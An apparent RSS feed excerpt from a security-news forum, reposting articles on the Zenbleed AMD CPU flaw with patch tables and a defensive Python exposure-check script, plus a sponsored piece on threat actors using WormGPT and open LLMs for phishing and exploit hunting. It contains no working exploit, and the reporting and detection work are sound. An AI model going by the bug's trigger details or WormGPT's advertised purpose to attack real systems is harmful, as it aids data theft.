	AMD's security bulletin summarizes the new vulnerability, tracked as CVE-2023-20593, and lists the AGESA firmware versions that will carry the Zenbleed fix. Most of these are planned for <a href="https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7008.html" rel="external nofollow">release</a> around October to December 2023:
</p>

<p style="margin-left: 40px;">
	 
</p>

<p>
	<strong>Summary</strong>
</p>

<p>
	 
</p>

<p>
	Under specific microarchitectural circumstances, a register in “Zen 2” CPUs may not be written to 0 correctly. This may cause data from another process and/or thread to be stored in the YMM register, which may allow an attacker to potentially access sensitive information.
</p>

<p>
	 
</p>

<p>
	<strong>CVE Details</strong>
</p>

<p>
	 
</p>

<table border="1px solid black;">
	<thead>
		<tr>
			<th scope="col">
				<p>
					<strong>CVE</strong>
				</p>
			</th>
			<th scope="col">
				<p>
					<strong>Severity</strong>
				</p>
			</th>
			<th scope="col">
				<p>
					<strong>CVE Description</strong>
				</p>
			</th>
		</tr>
	</thead>
	<tbody>
		<tr>
			<td style="white-space:nowrap">
				<p>
					CVE-2023-20593
				</p>
			</td>
			<td style="white-space:nowrap">
				<p>
					Medium
				</p>
			</td>
			<td>
				<p>
					An issue in “Zen 2” CPUs, under specific microarchitectural circumstances, may allow an attacker to potentially access sensitive information.
				</p>
			</td>
		</tr>
	</tbody>
</table>

<p>
	 
</p>

<p>
	<strong>Mitigation</strong>
</p>

<p>
	 
</p>

<p>
	AMD recommends applying the µcode patch listed below for AMD EPYC™ 7002 Processors, and applying BIOS updates that include the following AGESA™ firmware versions for other affected products. AMD plans to release to the Original Equipment Manufacturers (OEM) the AGESA™ versions on the target dates listed below. Please refer to your OEM for the BIOS update specific to your product.
</p>

<p>
	 
</p>

<p>
	<strong>DATA CENTER</strong>
</p>

<p>
	 
</p>

<table border="1px solid black;">
	<thead>
		<tr>
			<th scope="col">
				<p>
					<strong>Mitigation detail</strong>
				</p>

				<p>
					 
				</p>

				<p>
					<em>Update to versions listed or higher</em>
				</p>
			</th>
			<th scope="col">
				<p>
					<strong>2nd Gen AMD EPYC™ Processors</strong>
				</p>

				<p>
					 
				</p>

				<p>
					<strong>“Rome” </strong>
				</p>
			</th>
		</tr>
	</thead>
	<tbody>
		<tr>
			<td>
				<p style="text-align:center">
					µcode
				</p>
			</td>
			<td>
				<p style="text-align:center">
					0x0830107A
				</p>
			</td>
		</tr>
		<tr>
			<td>
				<p style="text-align:center">
					AGESA™ firmware
				</p>
			</td>
			<td>
				<p style="text-align:center">
					RomePI 1.0.0.H
				</p>
			</td>
		</tr>
	</tbody>
</table>

<p>
	 
</p>

<p>
	<strong>DESKTOP</strong>
</p>

<p>
	 
</p>

<table border="1px solid black;">
	<thead>
		<tr>
			<th scope="col">
				<p>
					<strong>Mitigation details</strong>
				</p>

				<p>
					 
				</p>

				<p>
					<em>Update to versions listed or higher</em>
				</p>
			</th>
			<th scope="col">
				<p>
					<strong>AMD Ryzen™ 3000 Series Desktop Processors<br>
					“Matisse” </strong>
				</p>
			</th>
			<th scope="col">
				<p>
					<a href="https://www.neowin.net/news/amd-announces-new-ryzen-4000-g-series-desktop-processors-with-radeon-graphics/" rel="external nofollow"><strong>AMD Ryzen™ 4000 Series Desktop Processors with Radeon™ Graphics<br>
					“Renoir” AM4</strong></a>
				</p>
			</th>
		</tr>
	</thead>
	<tbody>
		<tr>
			<td>
				<p>
					AGESA™ firmware
				</p>
			</td>
			<td style="white-space:nowrap">
				<p>
					ComboAM4v2PI_1.2.0.C (Target Dec 2023)
				</p>

				<p>
					 
				</p>

				<p>
					ComboAM4PI_1.0.0.C
				</p>

				<p>
					 
				</p>

				<p>
					(Target Dec 2023)
				</p>
			</td>
			<td>
				<p>
					ComboAM4v2PI_1.2.0.C (Target Dec 2023)
				</p>
			</td>
		</tr>
	</tbody>
</table>

<p>
	 
</p>

<p>
	<strong>HIGH END DESKTOP (HEDT)</strong>
</p>

<p>
	 
</p>

<table border="1px solid black;">
	<thead>
		<tr>
			<th scope="col">
				<p>
					<strong>Mitigation details</strong>
				</p>

				<p>
					 
				</p>

				<p>
					<em>Update to versions listed or higher</em>
				</p>
			</th>
			<th scope="col">
				<p>
					<strong>AMD Ryzen™ Threadripper™ 3000 Series Processors<br>
					“Castle Peak” HEDT</strong>
				</p>
			</th>
		</tr>
	</thead>
	<tbody>
		<tr>
			<td>
				<p style="text-align:center">
					AGESA™ firmware
				</p>
			</td>
			<td>
				<p style="text-align:center">
					CastlePeakPI-SP3r3 1.0.0.A
				</p>

				<p>
					 
				</p>

				<p style="text-align:center">
					(Target Oct 2023)
				</p>
			</td>
		</tr>
	</tbody>
</table>

<p>
	 
</p>

<p>
	<strong>WORKSTATION</strong>
</p>

<p>
	 
</p>

<table border="1px solid black;">
	<thead>
		<tr>
			<th scope="col">
				<p>
					<strong>Mitigation details</strong>
				</p>

				<p>
					 
				</p>

				<p>
					<em>Update to versions listed or higher</em>
				</p>
			</th>
			<th scope="col">
				<p>
					<strong>AMD Ryzen™ Threadripper™ PRO 3000WX Series Processors<br>
					“Castle Peak” WS SP3</strong>
				</p>
			</th>
		</tr>
	</thead>
	<tbody>
		<tr>
			<td>
				<p style="text-align:center">
					AGESA™ firmware
				</p>
			</td>
			<td style="white-space:nowrap">
				<p style="text-align:center">
					CastlePeakWSPI-sWRX8 1.0.0.C
				</p>

				<p>
					 
				</p>

				<p style="text-align:center">
					(Target Nov 2023)
				</p>

				<p>
					 
				</p>

				<p style="text-align:center">
					ChagallWSPI-sWRX8 1.0.0.7
				</p>

				<p>
					 
				</p>

				<p style="text-align:center">
					(Target Dec 2023)
				</p>
			</td>
		</tr>
	</tbody>
</table>

<p>
	 
</p>

<p>
	<strong>MOBILE - AMD Ryzen™ Series</strong>
</p>

<p>
	 
</p>

<table border="1px solid black;">
	<thead>
		<tr>
			<th scope="col">
				<p>
					<strong>Mitigation details</strong>
				</p>

				<p>
					 
				</p>

				<p>
					<em>Update to versions listed or higher</em>
				</p>
			</th>
			<th scope="col">
				<p>
					<a href="https://www.neowin.net/news/amd-introduces-ryzen-5000-mobile-processors-with-zen-3-cores/" rel="external nofollow"><strong>AMD Ryzen™ 5000 Series Mobile Processors with Radeon™ Graphics<br>
					“Lucienne”</strong></a>
				</p>
			</th>
			<th scope="col">
				<p>
					<a href="https://www.neowin.net/news/amd-introduces-ryzen-4000-mobile-the-word039s-first-7nm-x86-processors/" rel="external nofollow"><strong>AMD Ryzen™ 4000 Series Mobile Processors with Radeon™ Graphics<br>
					“Renoir” </strong></a>
				</p>
			</th>
			<th scope="col">
				<p>
					<a href="https://www.neowin.net/news/amd-tries-making-ryzen-7000-mobile-lineup-less-confusing-with-new-orange-stickers/" rel="external nofollow"><strong>AMD Ryzen™ 7020 Series Processors</strong></a>
				</p>

				<p>
					 
				</p>

				<p>
					<a href="https://www.neowin.net/news/amd-tries-making-ryzen-7000-mobile-lineup-less-confusing-with-new-orange-stickers/" rel="external nofollow"><strong>“Mendocino” FT6</strong></a>
				</p>
			</th>
		</tr>
	</thead>
	<tbody>
		<tr>
			<td style="white-space:nowrap">
				<p>
					AGESA™ firmware
				</p>
			</td>
			<td style="white-space:nowrap">
				<p>
					CezannePI-FP6_1.0.1.0
				</p>

				<p>
					 
				</p>

				<p>
					(Target Dec 2023)
				</p>
			</td>
			<td style="white-space:nowrap">
				<p>
					RenoirPI-FP6_1.0.0.D
				</p>

				<p>
					 
				</p>

				<p>
					(Target Nov 2023)
				</p>
			</td>
			<td style="white-space:nowrap">
				<p>
					MendocinoPI-FT6_1.0.0.6
				</p>

				<p>
					 
				</p>

				<p>
					(Target Dec 2023)
				</p>
			</td>
		</tr>
	</tbody>
</table>

<p>
	 
</p>

<p>
	Tavis Ormandy, a security vulnerability researcher at Google, discovered the flaw and explained it in a blog post. The issue involves the vector registers (the 128-bit XMM registers are the lower halves of the 256-bit YMM registers, whose upper halves the vzeroupper instruction clears) and incorrect recovery when a vzeroupper is mispredicted. Ormandy <a href="https://lock.cmpxchg8b.com/zenbleed.html" rel="external nofollow">writes</a><span>:</span>
</p>

<p style="margin-left: 40px;">
	 
</p>

<p style="margin-left: 40px;">
	<em>It turns out that with precise scheduling, you can cause some processors to recover from a mispredicted vzeroupper incorrectly!</em>
</p>

<p style="margin-left: 40px;">
	 
</p>

<p style="margin-left: 40px;">
	<em>The bug works like this, first of all you need to trigger something called the XMM Register Merge Optimization, followed by a register rename and a mispredicted vzeroupper. This all has to happen within a precise window to work.</em>
</p>

<p style="margin-left: 40px;">
	 
</p>

<p style="margin-left: 40px;">
	<em>We now know that basic operations like strlen, memcpy and strcmp will use the vector registers - so we can effectively spy on those operations happening anywhere on the system! It doesn’t matter if they’re happening in other virtual machines, sandboxes, containers, processes, whatever!</em>
</p>

<p style="margin-left: 40px;">
	 
</p>

<p style="margin-left: 40px;">
	<em>This works because the register file is shared by everything on the same physical core. In fact, two hyperthreads even share the same physical register file.</em>
</p>

<p>
	 
</p>

<p>
	In case you are unaware, a use-after-free (UAF) is a flaw in which a program keeps using a resource after it has been released and possibly handed out again. In software the resource is usually heap memory: a pointer to a freed allocation is dereferenced again, and an attacker who can control what is placed in that memory can corrupt data or, in the worst case, achieve code execution.
</p>

<p>
	 
</p>

<p>
	Zenbleed is, in effect, the same pattern inside the processor. The resource is a physical register in the vector register file that every thread on a core shares: when the CPU recovers from a mispredicted vzeroupper incorrectly, a YMM register can be left referring to physical storage that has already been released and reused by other code, so reading it returns stale data belonging to another process, container or virtual machine. Because the attacker only reads what was left behind, the result is information disclosure rather than code execution, which is why this use-after-free leaks data instead of hijacking control flow.
</p>

<p>
	 
</p>

<p>
	In a statement to <a href="https://www.tomshardware.com/news/zenbleed-bug-allows-data-theft-from-amds-zen-2-processors-patches-released" rel="external nofollow">Tom's Hardware</a>, AMD said that any performance impact from the fix will vary depending on workload and system configuration, and that it is not aware of any exploitation in the wild:
</p>

<p style="margin-left: 40px;">
	 
</p>

<p style="margin-left: 40px;">
	<em>Any performance impact will vary depending on workload and system configuration. AMD is not aware of any known exploit of the described vulnerability outside the research environment.</em>
</p>

<p>
	 
</p>

<p>
	We will update the article if more information is available on the topic.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/amd-confirms-firmware-update-for-ryzen-3000-4000-5000-7000-cpus-vulnerable-to-zenbleed/" rel="external nofollow">Source</a>
</p>
]]></description><guid isPermaLink="false">17312</guid><pubDate>Tue, 25 Jul 2023 20:55:45 +0000</pubDate></item><item><title>Encryption-breaking, password-leaking bug in many AMD CPUs could take months to fix</title><link>https://nsaneforums.com/news/security-privacy-news/encryption-breaking-password-leaking-bug-in-many-amd-cpus-could-take-months-to-fix-r17311/</link><description><![CDATA[<h3>
	"Zenbleed" bug affects all Zen 2-based Ryzen, Threadripper, and EPYC CPUs.
</h3>

<div itemprop="articleBody">
	<p>
		A recently disclosed bug in many of AMD's newer consumer, workstation, and server processors can cause the chips to leak data at a rate of up to 30 kilobytes per core per second, <a href="https://lock.cmpxchg8b.com/zenbleed.html" rel="external nofollow">writes</a> Tavis Ormandy, a member of Google's Project Zero security team. Executed properly, the so-called "Zenbleed" vulnerability (CVE-2023-20593) could give attackers access to encryption keys and root and user passwords, along with other sensitive data from any system using a CPU based on AMD's Zen 2 architecture.
	</p>

	<p>
		 
	</p>

	<p>
		The bug allows attackers to swipe data from a CPU's registers. Modern processors attempt to speed up operations by guessing what they'll be asked to do next, called "speculative execution." But sometimes the CPU guesses wrong; Zen 2 processors don't properly recover from certain kinds of mispredictions, which is the bug that Zenbleed exploits to do its thing.
	</p>

	<p>
		 
	</p>

	<p>
		The bad news is that the exploit doesn't require physical hardware access and could potentially be triggered by JavaScript on a malicious website. The good news is that, at least for now, there don't seem to be any cases of this bug being exploited in the wild, and it requires precise timing to exploit, though that could change quickly now that the vulnerability has been disclosed.
	</p>

	<p>
		 
	</p>

	<p>
		"AMD is not aware of any known exploit of the described vulnerability outside the research environment," the company <a href="https://www.tomshardware.com/news/zenbleed-bug-allows-data-theft-from-amds-zen-2-processors-patches-released" rel="external nofollow">told Tom's Hardware</a>. Networking company Cloudflare also <a href="https://blog.cloudflare.com/zenbleed-vulnerability/" rel="external nofollow">says</a> there is "no evidence of the bug being exploited" on its servers.
	</p>

	<p>
		 
	</p>

	<p>
		Since the vulnerability is in the hardware, a firmware update from AMD is the best way to fully fix it; Ormandy says it is also fixable via a software update, but it "may have some performance cost." The bug affects all processors based on AMD's Zen 2 architecture, including several Ryzen desktop and laptop processors, EPYC 7002-series chips for servers, and Threadripper 3000- and 3000 Pro WX-series CPUs for workstations.
	</p>
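	<p>
		Working out whether a given Linux host is still exposed means combining three things from the two Zenbleed items above: the CPU must be a Zen 2 part (family 17h), the loaded microcode must be at or above the fixed revision where AMD publishes one (the bulletin gives only 0x0830107A, for EPYC 7002 “Rome”), and failing that the chicken bit Ormandy’s disclosure describes as the software workaround, bit 9 of the DE_CFG MSR (0xC0011029), must be set. The Python script below is an added example, not AMD’s, Ormandy’s or the article’s code. The family 17h model ranges it treats as Zen 2 are the ones the Linux kernel’s Zenbleed fix matches, the /proc/cpuinfo excerpt is constructed, and for Zen 2 parts other than Rome it deliberately reports “unknown” rather than guessing a microcode threshold: those need their BIOS/AGESA version checked against the tables.
	</p>

```python
import os
import re
import struct

# Software workaround from Ormandy's disclosure: setting bit 9 of the DE_CFG
# MSR (0xC0011029) disables the affected optimisation, at some performance cost.
MSR_DE_CFG = 0xC0011029
DE_CFG_ZENBLEED_BIT = 9

# Family 17h (23) model ranges that are Zen 2, as matched by the Linux kernel's
# Zenbleed fix. AMD's bulletin gives a fixed microcode revision only for
# EPYC 7002 "Rome"; the other parts are fixed through BIOS/AGESA updates, so
# no microcode threshold is assumed for them here.
ZEN2_MODELS = (
    ((0x30, 0x3F), "Rome / Castle Peak", 0x0830107A),
    ((0x60, 0x6F), "Renoir / Lucienne", None),
    ((0x70, 0x7F), "Matisse", None),
    ((0xA0, 0xAF), "Mendocino", None),
)

# Constructed /proc/cpuinfo excerpt for an EPYC 7002 core on pre-fix microcode.
SAMPLE_CPUINFO = """\
processor\t: 0
vendor_id\t: AuthenticAMD
cpu family\t: 23
model\t\t: 49
model name\t: AMD EPYC 7742 64-Core Processor
microcode\t: 0x8301052
"""


def parse_cpuinfo(text):
    """Return (vendor, family, model, microcode) from the first CPU block."""
    first_block = text.split("\n\n", 1)[0]
    fields = dict(re.findall(r"^([^\t:]+?)\s*:\s*(.*)$", first_block, re.M))
    return (
        fields.get("vendor_id", ""),
        int(fields.get("cpu family", "0")),
        int(fields.get("model", "0")),
        int(fields.get("microcode", "0"), 16),
    )


def zen2_info(vendor, family, model):
    """(codename, fixed microcode revision or None) for a Zen 2 part, else None."""
    if vendor != "AuthenticAMD" or family != 0x17:
        return None
    for (lo, hi), codename, good_rev in ZEN2_MODELS:
        if lo <= model <= hi:
            return codename, good_rev
    return None


def de_cfg_mitigated(de_cfg_value):
    """True if the Zenbleed chicken bit is set in a DE_CFG MSR value."""
    return bool(de_cfg_value & (1 << DE_CFG_ZENBLEED_BIT))


def read_msr(addr, cpu=0):
    """Read an MSR through /dev/cpu/N/msr (root and the msr kernel module required)."""
    with open(f"/dev/cpu/{cpu}/msr", "rb", buffering=0) as f:
        return struct.unpack("<Q", os.pread(f.fileno(), 8, addr))[0]


def assess(cpuinfo_text, de_cfg_value=None):
    """Classify a host as not-affected, microcode-fixed, workaround, vulnerable
    or unknown (Zen 2 part with no microcode threshold in the bulletin and no
    chicken bit set: check the BIOS/AGESA version against the tables)."""
    vendor, family, model, ucode = parse_cpuinfo(cpuinfo_text)
    info = zen2_info(vendor, family, model)
    if info is None:
        return "not-affected"
    _codename, good_rev = info
    if good_rev is not None and ucode >= good_rev:
        return "microcode-fixed"
    if de_cfg_value is not None and de_cfg_mitigated(de_cfg_value):
        return "workaround"
    return "vulnerable" if good_rev is not None else "unknown"


if __name__ == "__main__":
    with open("/proc/cpuinfo") as f:
        cpuinfo = f.read()
    try:
        de_cfg = read_msr(MSR_DE_CFG)
    except OSError:  # not root, msr module not loaded, or not an x86 host
        de_cfg = None
    print(assess(cpuinfo, de_cfg))
```

	<p>
		Reading the MSR needs root and the msr kernel module (modprobe msr); without them the script still classifies by microcode revision alone. A result of “workaround” means the mitigation is active but the performance cost Ormandy mentions applies until the firmware update is installed.
	</p>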

	<p>
		 
	</p>

	<p>
		AMD has <a href="https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7008.html" rel="external nofollow">already issued a firmware update</a> mitigating the issue for servers running the EPYC 7002 chips—arguably the most important of the patches since a busy server running multiple virtual machines is a more lucrative target for hackers than individual consumer PCs.
	</p>

	<p>
		 
	</p>

	<p>
		AMD says that "any performance impact will vary depending on workload and system configuration" but hasn't provided additional details.
	</p>

	<h2>
		When will I get a patch?
	</h2>

	<p>
		The Zen 2 architecture first came to consumer systems around four years ago in the form of the AMD Ryzen 3000 series; the Ryzen 5 3600 was especially popular among PC builders. But AMD's habit of <a href="https://arstechnica.com/gadgets/2023/01/amds-ryzen-7000-laptop-cpu-lineup-is-a-bewildering-patchwork-of-old-and-new/" rel="external nofollow">mixing-and-matching processor architectures</a> in recent CPU generations means that there are some Zen 2 chips sprinkled across the Ryzen 4000, 5000, and 7000 lineups as well, affecting some new systems as well as older ones.
	</p>

	<p>
		 
	</p>

	<table border="">
		<tbody>
			<tr>
				<th>
					CPU
				</th>
				<th>
					Released
				</th>
				<th>
					Planned fix
				</th>
				<th>
					AGESA version with fixes
				</th>
			</tr>
			<tr>
				<td>
					Ryzen 3000 (desktop)
				</td>
				<td>
					Mid-2019
				</td>
				<td>
					December 2023
				</td>
				<td>
					ComboAM4v2PI_1.2.0.C
				</td>
			</tr>
			<tr>
				<td>
					Ryzen 4000G (desktop)
				</td>
				<td>
					Mid-2020
				</td>
				<td>
					December 2023
				</td>
				<td>
					ComboAM4v2PI_1.2.0.C
				</td>
			</tr>
			<tr>
				<td>
					Ryzen 4000 (laptop)
				</td>
				<td>
					Early-mid 2020
				</td>
				<td>
					November 2023
				</td>
				<td>
					RenoirPI-FP6_1.0.0.D
				</td>
			</tr>
			<tr>
				<td>
					Ryzen 5700U/5500U/5300U (laptop)
				</td>
				<td>
					Early 2021
				</td>
				<td>
					December 2023
				</td>
				<td>
					CezannePI-FP6_1.0.1.0
				</td>
			</tr>
			<tr>
				<td>
					Ryzen 7020 (laptop)
				</td>
				<td>
					Late 2022
				</td>
				<td>
					December 2023
				</td>
				<td>
					MendocinoPI-FT6_1.0.0.6
				</td>
			</tr>
			<tr>
				<td>
					Ryzen Threadripper 3000
				</td>
				<td>
					Late 2019
				</td>
				<td>
					October 2023
				</td>
				<td>
					CastlePeakPI-SP3r3 1.0.0.A
				</td>
			</tr>
			<tr>
				<td>
					Ryzen Threadripper Pro 3000WX
				</td>
				<td>
					Mid-2020
				</td>
				<td>
					November/December 2023
				</td>
				<td>
					CastlePeakWSPI-sWRX8 1.0.0.C/ChagallWSPI-sWRX8 1.0.0.7
				</td>
			</tr>
			<tr>
				<td>
					EPYC 7002
				</td>
				<td>
					Mid-2019
				</td>
				<td>
					Patch available
				</td>
				<td>
					RomePI 1.0.0.H
				</td>
			</tr>
		</tbody>
	</table>

	<p>
		 
	</p>

	<p>
		If you're using Ryzen desktop processors, all Ryzen 3000-series and Ryzen 4000G-series chips (but not Ryzen 3000G, which uses an older Zen version) are vulnerable to Zenbleed. AMD plans to release a firmware fix by December, though your motherboard or PC manufacturer will be responsible for distributing the update.
	</p>

	<p>
		 
	</p>

	<p>
		Laptops are a bit trickier. Most Ryzen 4000-series laptop CPUs use Zen 2, and AMD plans to have an update ready for them in November. Many of the Ryzen 5000-series laptop CPUs transitioned to Zen 3, but the Ryzen 7 5700U, Ryzen 5 5500U, and Ryzen 3 5300U continued to use Zen 2. And the Ryzen 7020-series CPUs released in late 2022 for budget systems also use Zen 2. AMD plans to release an update for the 5000- and 7000-series chips in December.
	</p>

	<p>
		 
	</p>

	<p>
		AMD plans to release an update for Threadripper 3000-series systems in October and fixes for Threadripper Pro 3000WX-series systems in November and December.
	</p>

	<p>
		 
	</p>
</div>

<p>
	<a href="https://arstechnica.com/information-technology/2023/07/encryption-breaking-password-leaking-bug-in-many-amd-cpus-could-take-months-to-fix/" rel="external nofollow">Source</a>
</p>
]]></description><guid isPermaLink="false">17311</guid><pubDate>Tue, 25 Jul 2023 20:50:46 +0000</pubDate></item><item><title>How is the Dark Web Reacting to the AI Revolution?</title><link>https://nsaneforums.com/news/security-privacy-news/how-is-the-dark-web-reacting-to-the-ai-revolution-r17277/</link><description><![CDATA[<p>
	A quick search for “ChatGPT” on the dark web and Telegram shows 27,912 mentions in the past six months.
</p>

<p>
	 
</p>

<p>
	Much has been written about the potential for threat actors to use language models. With open source large language models (LLMs) such as LLaMA and Orca, and now the cybercrime model WormGPT, the trends around the <a href="https://flare.io/learn/resources/blog/cybercrime-assembly-line/?utm_campaign=Paid%20Partnerships&amp;utm_source=Referral%20%28Marketing%29&amp;utm_medium=Bleeping%20Computer&amp;utm_term=How%20is%20the%20Dark%20Web%20Reacting%20to%20the%20AI%20Revolution%3F" rel="external nofollow">commodification of cybercrime</a> and the increasing capabilities of models are set to collide.
</p>

<p>
	 
</p>

<p>
	Threat actors are already engaging in rigorous discussions of how language models can be used for everything from identifying 0-day exploits to crafting <a href="https://flare.io/learn/resources/blog/spear-phishing-defense-a-complete-2022-guide/?utm_campaign=Paid%20Partnerships&amp;utm_source=Referral%20%28Marketing%29&amp;utm_medium=Bleeping%20Computer&amp;utm_term=How%20is%20the%20Dark%20Web%20Reacting%20to%20the%20AI%20Revolution%3F" rel="external nofollow">spear-phishing</a> emails.
</p>

<p>
	 
</p>

<p>
	Open source models represent a particularly compelling opportunity for threat actors since they haven’t undergone reinforcement learning from human feedback (RLHF) focused on preventing risky or illegal answers.
</p>

<p>
	 
</p>

<p>
	This allows threat actors to actively use them to identify 0-days, write spear-phishing emails, and perform other types of cybercrime without the need for jailbreaks.
</p>

<p>
	 
</p>

<p>
	Threat exposure management firm <a href="http://flare.io/?utm_source=Referral+%28Marketing%29&amp;utm_medium=bleeping+computer&amp;utm_campaign=How+is+the+Dark+Web+Reacting+to+the+AI+Revolution" target="_blank" rel="external nofollow">Flare</a> has identified <a href="https://www.bleepingcomputer.com/news/security/openai-credentials-stolen-by-the-thousands-for-sale-on-the-dark-web/" rel="external nofollow">more than </a><a href="https://www.bleepingcomputer.com/news/security/openai-credentials-stolen-by-the-thousands-for-sale-on-the-dark-web/" rel="external nofollow">200,000 OpenAI credentials</a> currently being sold on the dark web in the form of stealer logs.
</p>

<p>
	 
</p>

<p>
	While this is undoubtedly concerning, the statistic only begins to scratch the surface of threat actors' interests in ChatGPT, GPT-4, and AI language models more broadly.
</p>

<p>
	 
</p>

<div>
	<p>
		<img alt="welcome-back.png" class="ipsImage" data-ratio="114.29" height="512" width="448" src="https://www.bleepstatic.com/images/news/security/f/flare/dark-web-ai/welcome-back.png">
	</p>

	<div>
		<em>Login page for a phishing-at-scale platform. Source: Flare</em>
	</div>
</div>

<h2>
	Trends Collide: The Cybercrime Ecosystem and Open Source AI Language Models 
</h2>

<p>
	In the past five years, there has been a dramatic growth in the commodification of cybercrime. A vast underground network now exists across Tor and <a href="https://flare.io/learn/resources/blog/telegram-dark-web/?utm_campaign=Paid%20Partnerships&amp;utm_source=Referral%20%28Marketing%29&amp;utm_medium=Bleeping%20Computer&amp;utm_term=How%20is%20the%20Dark%20Web%20Reacting%20to%20the%20AI%20Revolution%3F" rel="external nofollow">illicit Telegram channels</a> in which cybercriminals buy and sell personal information, network access, data leaks, credentials, infected devices, attack infrastructure, ransomware and more.
</p>

<p>
	 
</p>

<p>
	Commercially-minded cybercriminals will likely make increasing use of the quickly proliferating open source AI language models. The first such application, WormGPT, has already been created and is being sold for a monthly access fee.
</p>

<h3>
	Customized Spear-Phishing at Scale
</h3>

<p>
	Phishing-as-a-Service (PhaaS) already exists and provides ready-made infrastructure for launching phishing campaigns for a monthly fee.
</p>

<p>
	 
</p>

<p>
	There are already extensive discussions among threat actors about using WormGPT to facilitate broader, personalized phishing attacks.
</p>

<p>
	 
</p>

<p>
	The use of generative AI will likely enable cybercriminals to launch attacks against thousands of users with customized messages gleaned from data from social media accounts, <a href="https://flare.io/learn/resources/blog/telegram-investigation/?utm_campaign=Paid%20Partnerships&amp;utm_source=Referral%20%28Marketing%29&amp;utm_medium=Bleeping%20Computer&amp;utm_term=How%20is%20the%20Dark%20Web%20Reacting%20to%20the%20AI%20Revolution%3F" rel="external nofollow">OSINT sources</a>, and online databases, dramatically increasing the threat to employees from email phishing.
</p>

<p>
	 
</p>

<div>
	<p>
		<img alt="wormgpt-features-split.jpg" class="ipsImage" data-ratio="75.10" height="540" width="663" src="https://www.bleepstatic.com/images/news/security/f/flare/dark-web-ai/wormgpt-features-split.jpg">
	</p>

	<div>
		<em>A threat actor explains WormGPT. Source: Flare</em>
	</div>

	<p>
		 
	</p>
</div>

<p>
	"Tomorrow, API-WormGPT will be provided by Galaxy dev channel, the request status is unlimited and will be calculated periodically, and to use API-WORMGPT, you need to get an API-KEY. The latest news will be announced," a threat actor advertises WormGPT on Telegram.
</p>

<p>
	 
</p>

<p>
	"If you don't know what WORMGPT is: This WORMGPT is an unlimited version of CHATGPT, designed by hackers and made for illegal work, such as phishing and malware, etc. without any ethical sources."
</p>

<h3>
	Automated Exploit &amp; Exposure Identification
</h3>

<p>
	Projects such as <a href="https://github.com/yoheinakajima/babyagi" rel="external nofollow">BabyAGI</a> seek to use language models to loop on thoughts and carry out actions online, and potentially in the real world. As things stand today, many companies don’t have full visibility of their attack surface.
</p>

<p>
	 
</p>

<p>
	They rely on threat actors not quickly identifying unpatched services, credentials and API keys exposed in public GitHub repositories, and other forms of high-risk data exposure.
</p>

<p>
	 
</p>

<p>
	Semi-autonomous language models could quickly and abruptly shift the threat landscape by automating exposure detection at scale for threat actors.
</p>

<p>
	 
</p>

<p>
	Right now threat actors rely on a mix of tools used by cybersecurity professionals and manual effort to identify exposure that can grant initial access to a system.
</p>

<p>
	 
</p>

<p>
	We are likely years, or even months, away from systems that can not only detect obvious exposure such as credentials in a repository, but also identify new 0-day exploits in applications, dramatically decreasing the time security teams have to respond to exploits and data exposure.
</p>

<h3>
	Vishing and Deepfakes
</h3>

<p>
	Advances in generative AI also look set to create an extremely challenging environment for vishing attacks. AI-driven services can already realistically copy the sound of an individual's voice with less than 60 seconds of audio, and deepfake technology continues to improve.
</p>

<p>
	 
</p>

<p>
	Right now, deepfakes remain in the uncanny valley, making them somewhat obvious. However, the technology is rapidly progressing, and researchers continue to create and deploy additional open source projects.
</p>

<p>
	 
</p>

<div>
	<p>
		<img alt="wormgpt-responds-example.jpg" class="ipsImage" data-ratio="75.10" height="540" width="614" src="https://www.bleepstatic.com/images/news/security/f/flare/dark-web-ai/wormgpt-responds-example.jpg">
	</p>

	<div>
		<em>WormGPT responds to a prompt asking it to write an example of malware in Python. Source: Flare</em>
	</div>
</div>

<h3>
	Hacking &amp; Malware Generative AI Models
</h3>

<p>
	Open source LLMs already exist focused on red teaming activities such as <a href="https://github.com/GreyDGL/PentestGPT" rel="external nofollow">pen-test GPT</a>.
</p>

<p>
	 
</p>

<p>
	The functionality and specialization of a model largely depends on a multi-step process involving the data the model is trained on, reinforcement learning with human feedback, and other variables.
</p>

<p>
	 
</p>

<p>
	"There are some promising open source models like orca which has promise for being able to find 0days if it was tuned on code," explains a threat actor discussing Microsoft's Orca LLM.
</p>

<h2>
	What Does this Mean for Security Teams?
</h2>

<p>
	Your margin for error as a defender is about to drop substantially. Reducing SOC noise to focus on high-value events, and improving mean time to detect (MTTD) and mean time to respond (MTTR) for high-risk exposure whether on the dark or clear web should be a priority. 
</p>

<p>
	 
</p>

<p>
	AI adoption for security at companies will likely move considerably more slowly than it will for attackers, creating an asymmetry that adversaries will attempt to exploit.
</p>

<p>
	 
</p>

<p>
	Security teams must build an effective attack surface management program and ensure that employees receive substantial training on deepfakes &amp; spear-phishing, but beyond that, they should evaluate how AI can be used to rapidly detect and remediate gaps in the security perimeter.
</p>

<p>
	 
</p>

<p>
	Security is only as strong as the weakest link, and AI is about to make that weak link much easier to find.
</p>

<p>
	 
</p>

<p>
	<em>About Eric Clay</em>
</p>

<p>
	 
</p>

<p>
	<em>Eric is the Security Researcher at <a href="https://flare.io/?utm_source=Referral+%28Marketing%29&amp;utm_medium=bleeping+computer&amp;utm_campaign=How+is+the+Dark+Web+Reacting+to+the+AI+Revolution" target="_blank" rel="external nofollow">Flare</a>, a threat exposure monitoring platform. He has experience in security data analytics, security research, and applications of AI in cybersecurity.</em>
</p>

<p>
	 
</p>

<p>
	<em>Sponsored and written by <a href="https://flare.io/?utm_source=Referral+%28Marketing%29&amp;utm_medium=bleeping+computer&amp;utm_campaign=How+is+the+Dark+Web+Reacting+to+the+AI+Revolution" rel="external nofollow" target="_blank">Flare</a></em>
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/how-is-the-dark-web-reacting-to-the-ai-revolution/" rel="external nofollow">Source</a>
</p>
]]></description><guid isPermaLink="false">17277</guid><pubDate>Mon, 24 Jul 2023 21:16:38 +0000</pubDate></item><item><title>Microsoft enhances Windows 11 Phishing Protection with new features</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-enhances-windows-11-phishing-protection-with-new-features-r17268/</link><description><![CDATA[<p>
	Microsoft is further enhancing the Windows 11 Enhanced Phishing Protection by testing a new feature that warns users when they copy and paste their Windows password into websites and documents.
</p>

<p>
	 
</p>

<p>
	With the release of Windows 11 22H2, Microsoft introduced a new security feature called Enhanced Phishing protection, designed to protect your Windows and Active Directory domain credentials from being obtained by threat actors.
</p>

<p>
	 
